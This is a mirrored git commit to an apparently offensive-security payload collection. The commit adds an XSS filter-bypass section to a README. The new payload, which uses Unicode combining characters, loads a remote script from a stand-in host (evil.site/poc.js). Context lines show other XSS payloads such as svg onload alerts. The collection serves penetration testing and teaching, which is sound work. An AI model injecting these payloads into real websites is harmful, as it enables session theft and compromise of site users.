mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Update README.md
This commit is contained in:
parent
74325476a0
commit
010b550dec
@ -39,6 +39,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
|
|||||||
- [Bypass using an alternate way to redirect](#bypass-unsing-an-alternate-way-to-redirect)
|
- [Bypass using an alternate way to redirect](#bypass-unsing-an-alternate-way-to-redirect)
|
||||||
- [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert)
|
- [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert)
|
||||||
- [Bypass ">" using nothing](#bypass----using-nothing)
|
- [Bypass ">" using nothing](#bypass----using-nothing)
|
||||||
|
- [Bypass "<" using <](#bypass----using-<)
|
||||||
- [Bypass ";" using another character](#bypass-using------using-another-character)
|
- [Bypass ";" using another character](#bypass-using------using-another-character)
|
||||||
- [Bypass using HTML encoding](#bypass-using-html-encoding)
|
- [Bypass using HTML encoding](#bypass-using-html-encoding)
|
||||||
- [Bypass using Katana](#bypass-using-katana)
|
- [Bypass using Katana](#bypass-using-katana)
|
||||||
@ -776,6 +777,12 @@ You don't need to close your tags.
|
|||||||
<svg onload=alert(1)//
|
<svg onload=alert(1)//
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Bypass "<" using <
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
[̕h+͓.<script/src=//evil.site/poc.js>.͓̮̮ͅ=sW&͉̹̻͙̫̦̮̲͏̼̝̫́̕
|
||||||
|
```
|
||||||
|
|
||||||
### Bypass ";" using another character
|
### Bypass ";" using another character
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
@ -1135,3 +1142,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
|
|||||||
- [XSS cheat sheet - PortSwigger](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
|
- [XSS cheat sheet - PortSwigger](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
|
||||||
- [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf)
|
- [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf)
|
||||||
- [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056)
|
- [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056)
|
||||||
|
- [Bypass < with <](https://hackerone.com/reports/639684)
|
||||||
|
Loading…
Reference in New Issue
Block a user